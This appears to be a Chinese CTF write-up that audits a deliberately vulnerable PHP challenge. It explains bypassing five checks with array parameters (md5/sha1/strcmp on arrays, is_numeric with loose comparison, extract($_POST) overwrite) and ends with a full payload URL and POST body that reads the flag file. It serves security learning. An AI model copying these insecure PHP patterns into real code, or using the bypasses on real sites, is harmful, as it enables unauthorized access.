开始代码审计.

 <?php
error_reporting(0);
highlight_file(__FILE__);if(isset($_GET['key1']) && isset($_GET['key2'])){echo "=Level 1=<br>";if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){$flag1 = True;}else{die("nope,this is level 1");}
}if($flag1){echo "=Level 2=<br>";if(isset($_POST['key3'])){if(md5($_POST['key3']) === sha1($_POST['key3'])){$flag2 = True;}}else{die("nope,this is level 2");}
}if($flag2){echo "=Level 3=<br>";if(isset($_GET['key4'])){if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){$flag3 = True;}else{die("nope,this is level 3");}}
}if($flag3){echo "=Level 4=<br>";if(isset($_GET['key5'])){if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){$flag4 = True;}else{die("nope,this is level 4");}}
}if($flag4){echo "=Level 5=<br>";extract($_POST);foreach($_POST as $var){if(preg_match("/[a-zA-Z0-9]/",$var)){die("nope,this is level 5");}}if($flag5){echo file_get_contents("/flag");}else{die("nope,this is level 5");}
} 

LEVEL1:  因为hash函数无法解析数组会返回false，直接用数组绕过key1[]=1&key2[]=2

if(isset($_GET['key1']) && isset($_GET['key2'])){echo "=Level 1=<br>";if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){$flag1 = True;}else{die("nope,this is level 1");}
}

LEVEL2: 和第一关一样数组绕过key3[]=3

if($flag1){echo "=Level 2=<br>";if(isset($_POST['key3'])){if(md5($_POST['key3']) === sha1($_POST['key3'])){$flag2 = True;}}else{die("nope,this is level 2");}
}

LEVEL3: strcmp()无法解析数组，所以继续用数组绕过key4[]=4

if($flag2){echo "=Level 3=<br>";if(isset($_GET['key4'])){if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){$flag3 = True;}else{die("nope,this is level 3");}}
}

LEVEL4: 没错继续用数组绕过,is_numeric()无法解析数组会返回false，而且数组大于2023.

至于为什么大于2023，我们来做个小实验.key5[]=5

<?php
$list=[5];
if($list>2023){echo 0;};	
?>result: 0 

就是那么神奇 .

if($flag3){echo "=Level 4=<br>";if(isset($_GET['key5'])){if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){$flag4 = True;}else{die("nope,this is level 4");}}
}

LEVEL5: 哈哈又是数组绕过，这里要输入的POST内容不能是字母和数字，所以我们可以用数组，当然也可以不用只要输入的value为真且不是正则表达是匹配到的范围就可以了,flag5=. ，或者flag5[]=love

if($flag4){echo "=Level 5=<br>";extract($_POST);foreach($_POST as $var){if(preg_match("/[a-zA-Z0-9]/",$var)){die("nope,this is level 5");}}if($flag5){echo file_get_contents("/flag");}else{die("nope,this is level 5");}
} 

开始构造payload.

http://34bdf7e3-ab3b-462a-9993-25c34ac97098.node5.buuoj.cn:81/?key1[]=1&key2[]=2&key4[]=4&key5[]=5post: key3[]=3&flag5[]=love

 

得到flag，游戏结束~